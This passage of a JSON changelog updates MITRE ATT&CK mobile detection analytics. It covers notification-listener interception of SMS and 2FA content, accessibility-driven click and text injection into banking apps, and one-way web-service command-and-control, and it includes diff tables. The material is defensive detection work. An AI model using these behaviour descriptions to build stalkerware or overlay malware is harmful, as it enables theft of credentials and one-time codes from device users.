\"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing repeated one-way retrieval was not present in approved managed-app baseline or was not permitted to use detected public web-service class for background content retrieval\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to120__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to120__0\"><a href=\"#difflib_chg_to120__top\">t</a></td><td class=\"diff_header\" id=\"from120_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;provide&nbsp;a&nbsp;list&nbsp;of&nbsp;connectio</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to120__top\">t</a></td><td class=\"diff_header\" id=\"to120_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;repeated&nbsp;retrieval-oriented&nbsp;communic</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;application,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation&nbsp;from&nbsp;a&nbsp;supervised&nbsp;device&nbsp;or&nbsp;managed&nbsp;iOS&nbsp;app&nbsp;to&nbsp;a&nbsp;legit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;Many&nbsp;properly&nbsp;configured&nbsp;firew</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">imate&nbsp;public&nbsp;web-service&nbsp;platform&nbsp;where&nbsp;the&nbsp;activity&nbsp;remains</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">alls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;one-way&nbsp;command&nbsp;and&nbsp;control&nbsp;traffic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;primarily&nbsp;inbound&nbsp;and&nbsp;does&nbsp;not&nbsp;produce&nbsp;corresponding&nbsp;writeb</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ack&nbsp;to&nbsp;that&nbsp;same&nbsp;service&nbsp;class&nbsp;during&nbsp;the&nbsp;operational&nbsp;window</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.&nbsp;The&nbsp;strongest&nbsp;iOS&nbsp;evidence&nbsp;is&nbsp;managed-app&nbsp;or&nbsp;device-attrib</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">uted&nbsp;communication&nbsp;to&nbsp;collaboration,&nbsp;social,&nbsp;messaging,&nbsp;stor</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">age,&nbsp;or&nbsp;generic&nbsp;HTTPS&nbsp;platforms&nbsp;where&nbsp;inbound&nbsp;fetches&nbsp;or&nbsp;con</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tent&nbsp;pulls&nbsp;recur&nbsp;during&nbsp;background&nbsp;refresh,&nbsp;while&nbsp;the&nbsp;device</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;is&nbsp;locked,&nbsp;or&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction,&nbsp;and&nbsp;no&nbsp;match</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing&nbsp;POST,&nbsp;upload,&nbsp;update,&nbsp;or&nbsp;message-send&nbsp;activity&nbsp;to&nbsp;that&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ame&nbsp;public&nbsp;service&nbsp;class&nbsp;is&nbsp;observed.&nbsp;Because&nbsp;direct&nbsp;local&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">untime&nbsp;visibility&nbsp;is&nbsp;weaker&nbsp;than&nbsp;Android,&nbsp;the&nbsp;primary&nbsp;analyt</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ic&nbsp;is&nbsp;anchored&nbsp;on&nbsp;network&nbsp;directionality&nbsp;plus&nbsp;supervised&nbsp;man</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aged-app&nbsp;and&nbsp;device-state&nbsp;context.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--462f9ed4-5b6b-4426-b383-cd331f2984c0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-01 14:50:46.895000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0611#AN1665",
                            "external_id": "AN1665"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1665",
                    "description": "An application is granted or maintains notification listener access, observes notification content from other applications (including sensitive sources such as SMS/email/2FA apps), processes or stores notification payloads, and optionally suppresses or programmatically interacts with notifications (dismiss/action triggers) without corresponding foreground user interaction. Detection correlates special access permission state + notification event interception + application background state + downstream data use (local write or network transmission).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "NotificationListenerService enabled OR notification access granted to app not in enterprise-approved list"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Notification access event occurs while app_state=background AND device_state=locked OR no recent user interaction"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between notification interception and subsequent data write or network transmission varies by app behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Enterprise-approved apps with legitimate notification access (e.g., accessibility tools, wearables)"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether notification access is expected only when the app is foregrounded"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for small outbound payloads indicative of notification content exfiltration"
                        },
                        {
                            "field": "SensitiveSourceApps",
                            "description": "Apps whose notifications are considered sensitive (SMS, email, authenticator apps)"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between notification interception and subsequent data write or network transmission varies by app behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Enterprise-approved apps with legitimate notification access (e.g., accessibility tools, wearables)\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether notification access is expected only when the app is foregrounded\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for small outbound payloads indicative of notification content exfiltration\"}, {\"field\": \"SensitiveSourceApps\", \"description\": \"Apps whose notifications are considered sensitive (SMS, email, authenticator apps)\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-01 14:50:46.895000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"An application is granted or maintains notification listener access, observes notification content from other applications (including sensitive sources such as SMS/email/2FA apps), processes or stores notification payloads, and optionally suppresses or programmatically interacts with notifications (dismiss/action triggers) without corresponding foreground user interaction. Detection correlates special access permission state + notification event interception + application background state + downstream data use (local write or network transmission).\", \"old_value\": \"The user can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). \\nApplication vetting services can look for applications requesting the `BIND_NOTIFICATION_LISTENER_SERVICE` permission in a service declaration. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). \\n-Application vetting services can look for applications requesting the `BIND_NOTIFICATION_LISTENER_SERVICE` permission in a service declaration. \\n+An application is granted or maintains notification listener access, observes notification content from other applications (including sensitive sources such as SMS/email/2FA apps), processes or stores notification payloads, and optionally suppresses or programmatically interacts with notifications (dismiss/action triggers) without corresponding foreground user interaction. Detection correlates special access permission state + notification event interception + application background state + downstream data use (local write or network transmission).\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"NotificationListenerService enabled OR notification access granted to app not in enterprise-approved list\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Notification access event occurs while app_state=background AND device_state=locked OR no recent user interaction\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to111__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to111__0\"><a href=\"#difflib_chg_to111__top\">t</a></td><td class=\"diff_header\" id=\"from111_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;also&nbsp;inspect&nbsp;and&nbsp;modify&nbsp;the&nbsp;list&nbsp;of&nbsp;application</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to111__top\">t</a></td><td class=\"diff_header\" id=\"to111_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">An&nbsp;application&nbsp;is&nbsp;granted&nbsp;or&nbsp;maintains&nbsp;notification&nbsp;listener</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;that&nbsp;have&nbsp;notification&nbsp;access&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;access,&nbsp;observes&nbsp;notification&nbsp;content&nbsp;from&nbsp;other&nbsp;applicatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">(e.g.&nbsp;Apps&nbsp;&amp;&nbsp;notification&nbsp;-&gt;&nbsp;Special&nbsp;app&nbsp;access&nbsp;-&gt;&nbsp;Notificat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ns&nbsp;(including&nbsp;sensitive&nbsp;sources&nbsp;such&nbsp;as&nbsp;SMS/email/2FA&nbsp;apps),</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion&nbsp;access).&nbsp;&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;for&nbsp;appl</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;processes&nbsp;or&nbsp;stores&nbsp;notification&nbsp;payloads,&nbsp;and&nbsp;optionally&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ications&nbsp;requesting&nbsp;the&nbsp;`BIND_NOTIFICATION_LISTENER_SERVICE`</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">uppresses&nbsp;or&nbsp;programmatically&nbsp;interacts&nbsp;with&nbsp;notifications&nbsp;(</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;permission&nbsp;in&nbsp;a&nbsp;service&nbsp;declaration.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">dismiss/action&nbsp;triggers)&nbsp;without&nbsp;corresponding&nbsp;foreground&nbsp;us</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;interaction.&nbsp;Detection&nbsp;correlates&nbsp;special&nbsp;access&nbsp;permissi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;state&nbsp;+&nbsp;notification&nbsp;event&nbsp;interception&nbsp;+&nbsp;application&nbsp;bac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">kground&nbsp;state&nbsp;+&nbsp;downstream&nbsp;data&nbsp;use&nbsp;(local&nbsp;write&nbsp;or&nbsp;network&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">transmission).</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--dda0e909-cceb-40eb-bff0-6bd0cd74e638",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-30 16:54:01.193000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0612#AN1666",
                            "external_id": "AN1666"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1666",
                    "description": "The defender correlates Android accessibility or UI-automation-capable behavior from an app identity with injected user-interface actions occurring on behalf of the user in another foreground application. The strongest Android evidence is accessibility-enabled or similarly privileged app behavior that triggers programmatic clicks, global actions, or text insertion into another app's active UI, especially when those actions occur without matching user touch interaction, while the injecting app is backgrounded or foreground-service-only, or when the target foreground app belongs to a sensitive category such as banking, payments, identity, communications, or enterprise access. The detection is strengthened when the injected input sequence is followed by target-app navigation, form submission, transaction progression, or network activity from the target context.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Injecting app remained backgrounded or foreground-service-only while injected click, global action, or text insertion occurred in a different foreground app"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before injected UI action and no matching touch interaction was observed for the target foreground app during injection sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Sensitive app category remained foregrounded during injected UI sequence from different app identity"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window linking injected actions to target-app navigation, submission, or downstream network effects."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved accessibility, autofill, remote-assist, or QA/testing apps vary by organization and device group."
                        },
                        {
                            "field": "AllowedAccessibilityApps",
                            "description": "Approved accessibility-enabled apps vary by assistive and enterprise workflow."
                        },
                        {
                            "field": "AllowedAutofillApps",
                            "description": "Approved password managers or autofill-capable apps may legitimately inject text into fields."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close an injected action must be to user interaction to be considered expected."
                        },
                        {
                            "field": "SensitiveForegroundAppCategories",
                            "description": "Categories such as banking, payments, identity, communications, and enterprise access may warrant higher sensitivity."
                        },
                        {
                            "field": "GlobalActionBurstThreshold",
                            "description": "Threshold for repeated programmatic global actions within a short window."
                        },
                        {
                            "field": "TextInjectionLengthThreshold",
                            "description": "Minimum inserted text length or field-population pattern considered suspicious outside approved autofill workflows."
                        },
                        {
                            "field": "ConsentOrSetupGracePeriod",
                            "description": "Grace period allowed after explicit user enablement of approved accessibility or autofill workflows before injection is treated as suspicious."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window linking injected actions to target-app navigation, submission, or downstream network effects.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved accessibility, autofill, remote-assist, or QA/testing apps vary by organization and device group.\"}, {\"field\": \"AllowedAccessibilityApps\", \"description\": \"Approved accessibility-enabled apps vary by assistive and enterprise workflow.\"}, {\"field\": \"AllowedAutofillApps\", \"description\": \"Approved password managers or autofill-capable apps may legitimately inject text into fields.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close an injected action must be to user interaction to be considered expected.\"}, {\"field\": \"SensitiveForegroundAppCategories\", \"description\": \"Categories such as banking, payments, identity, communications, and enterprise access may warrant higher sensitivity.\"}, {\"field\": \"GlobalActionBurstThreshold\", \"description\": \"Threshold for repeated programmatic global actions within a short window.\"}, {\"field\": \"TextInjectionLengthThreshold\", \"description\": \"Minimum inserted text length or field-population pattern considered suspicious outside approved autofill workflows.\"}, {\"field\": \"ConsentOrSetupGracePeriod\", \"description\": \"Grace period allowed after explicit user enablement of approved accessibility or autofill workflows before injection is treated as suspicious.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-30 16:54:01.193000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates Android accessibility or UI-automation-capable behavior from an app identity with injected user-interface actions occurring on behalf of the user in another foreground application. The strongest Android evidence is accessibility-enabled or similarly privileged app behavior that triggers programmatic clicks, global actions, or text insertion into another app's active UI, especially when those actions occur without matching user touch interaction, while the injecting app is backgrounded or foreground-service-only, or when the target foreground app belongs to a sensitive category such as banking, payments, identity, communications, or enterprise access. The detection is strengthened when the injected input sequence is followed by target-app navigation, form submission, transaction progression, or network activity from the target context.\", \"old_value\": \"The user can view applications that have registered accessibility services in the accessibility menu within the device settings.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Injecting app remained backgrounded or foreground-service-only while injected click, global action, or text insertion occurred in a different foreground app\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before injected UI action and no matching touch interaction was observed for the target foreground app during injection sequence\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Sensitive app category remained foregrounded during injected UI sequence from different app identity\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to152__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to152__0\"><a href=\"#difflib_chg_to152__top\">t</a></td><td class=\"diff_header\" id=\"from152_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;applications&nbsp;that&nbsp;have&nbsp;registered&nbsp;accessib</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to152__top\">t</a></td><td class=\"diff_header\" id=\"to152_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;Android&nbsp;accessibility&nbsp;or&nbsp;UI-automati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ility&nbsp;services&nbsp;in&nbsp;the&nbsp;accessibility&nbsp;menu&nbsp;within&nbsp;the&nbsp;device&nbsp;s</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on-capable&nbsp;behavior&nbsp;from&nbsp;an&nbsp;app&nbsp;identity&nbsp;with&nbsp;injected&nbsp;user-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ettings.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 